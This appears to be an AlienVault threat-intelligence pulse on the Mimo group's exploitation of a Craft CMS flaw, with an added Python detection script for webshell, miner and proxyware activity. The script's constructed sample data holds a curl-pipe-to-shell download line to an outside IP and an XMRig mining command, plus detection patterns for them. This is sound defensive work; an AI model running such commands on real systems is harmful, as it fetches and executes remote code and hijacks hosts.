The Sharp Taste of Mimo'lette: Analyzing Mimo's Latest Campaign targeting Craft CMS
Between February and May 2025, multiple exploitations of CVE-2025-32432, a remote code execution vulnerability in Craft CMS, were observed. The attack chain deploys a webshell, downloads an infection script, and executes malicious payloads including a loader, a cryptocurrency miner, and residential proxyware. The Mimo intrusion set is believed responsible, using distinctive identifiers such as '4l4md4r' and 'n1tr0'. The group deploys XMRig for cryptomining and IPRoyal for bandwidth monetization. Two potential operators, 'EtxArny' and 'N1tr0', were identified through social media analysis. While the group shows interest in Middle Eastern affairs, its primary motivation appears to be financial. Detection opportunities include monitoring for processes executing from temporary directories and for kernel module alterations.
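The detection opportunities named above (web-server workers spawning shells, download-and-execute one-liners, payloads running out of temporary directories, miner and proxyware command lines, and newly loaded kernel modules) can be turned into a small host triage script. The code below is an added example and is not from the OTX pulse or the underlying report. It assumes `ps -eo pid,ppid,user,comm,args`-style process records and `lsmod` output as input; the indicator strings are assumptions derived from the tooling named in the summary (XMRig, IPRoyal), not indicators of compromise from the report, and every sample line, path, IP address and module name is constructed for the example.

```python
"""Host triage for a Mimo-style chain: webshell -> infection script -> loader -> miner/proxyware.

Added example, not from the OTX pulse or the original report. Input formats assumed:
`ps -eo pid,ppid,user,comm,args` records and plain `lsmod` output. All sample data
below is constructed; the IP addresses are documentation ranges.
"""
import re
from dataclasses import dataclass

# World-writable locations that legitimate long-running services rarely execute from.
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Web-server worker names (assumption: typical PHP/HTTP stacks hosting Craft CMS).
WEB_WORKERS = {"php-fpm", "php-fpm8.2", "php-fpm8.3", "apache2", "httpd", "nginx"}
SHELLS = {"sh", "bash", "dash"}
# Command-line indicators (assumption: based on the tools named in the summary,
# not on IOCs from the report).
PAYLOAD_PATTERNS = {
    "download_exec": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", re.I),
    "xmrig": re.compile(r"xmrig|stratum\+(tcp|ssl)://|--donate-level", re.I),
    "iproyal": re.compile(r"iproyal|pawns", re.I),
}


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    comm: str
    args: str


def parse_ps(text: str) -> list[Proc]:
    """Parse `ps -eo pid,ppid,user,comm,args` output; the first line is the header."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        if not line.strip():
            continue
        parts = line.split(None, 4)
        while len(parts) < 5:          # tolerate a record with an empty ARGS column
            parts.append("")
        pid, ppid, user, comm, args = parts
        procs.append(Proc(int(pid), int(ppid), user, comm, args))
    return procs


def triage(procs: list[Proc]) -> list[tuple[int, str, str]]:
    """Return (pid, finding_kind, evidence) tuples for suspicious processes."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        tokens = p.args.split()
        # Executable or any argument pointing into a temp directory (loader, miner, proxyware).
        temp_refs = [t for t in tokens if t.startswith(TEMP_DIRS)]
        if temp_refs:
            findings.append((p.pid, "tempdir_in_cmdline", temp_refs[0]))
        # A shell whose parent is a web-server worker is the webshell stage.
        parent = by_pid.get(p.ppid)
        if parent and parent.comm in WEB_WORKERS and p.comm in SHELLS:
            findings.append((p.pid, "webworker_spawned_shell", p.args))
        for name, pat in PAYLOAD_PATTERNS.items():
            if pat.search(p.args):
                findings.append((p.pid, f"payload_indicator:{name}", p.args))
    return findings


def new_modules(current_lsmod: str, baseline_lsmod: str) -> list[str]:
    """Kernel modules loaded now but absent from a known-good baseline (first column of lsmod)."""
    def names(text: str) -> set[str]:
        return {l.split()[0] for l in text.strip().splitlines()[1:] if l.strip()}
    return sorted(names(current_lsmod) - names(baseline_lsmod))


# Constructed sample data (not real telemetry).
SAMPLE_PS = """\
PID   PPID USER     COMMAND  ARGS
1        0 root     systemd  /sbin/init
812      1 www-data php-fpm  php-fpm: pool www
913    812 www-data sh       sh -c curl -s http://198.51.100.23/infect.sh | sh
977    913 www-data bash     bash /tmp/.cache/loader
1002   977 www-data xmrig    /tmp/.cache/xmrig -o stratum+tcp://203.0.113.7:3333 --donate-level 0
1030   977 www-data pawns    /dev/shm/iproyal/pawns-cli --email user@example.net
1100     1 root     sshd     /usr/sbin/sshd -D
"""
SAMPLE_LSMOD_BASE = """\
Module                  Size  Used by
ext4                  700000  1
xfs                  1500000  0
"""
SAMPLE_LSMOD_NOW = SAMPLE_LSMOD_BASE + "unknown_mod            16384  0\n"

if __name__ == "__main__":
    for pid, kind, evidence in triage(parse_ps(SAMPLE_PS)):
        print(f"pid={pid:<5} {kind:<32} {evidence}")
    print("new kernel modules:", new_modules(SAMPLE_LSMOD_NOW, SAMPLE_LSMOD_BASE))
```

On a live host the same functions would be fed the real `ps` and `lsmod` output; the module baseline should be captured from a known-clean image rather than from the host under investigation, since a rootkit module that hides itself from `lsmod` will not appear in either listing.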
Pulse ID: 68360c3f4169ef29b7c93f6f
Pulse Link: https://otx.alienvault.com/pulse/68360c3f4169ef29b7c93f6f
Pulse Author: AlienVault
Created: 2025-05-27 19:02:23
Be advised, this data is unverified and should be considered preliminary. Always do further verification.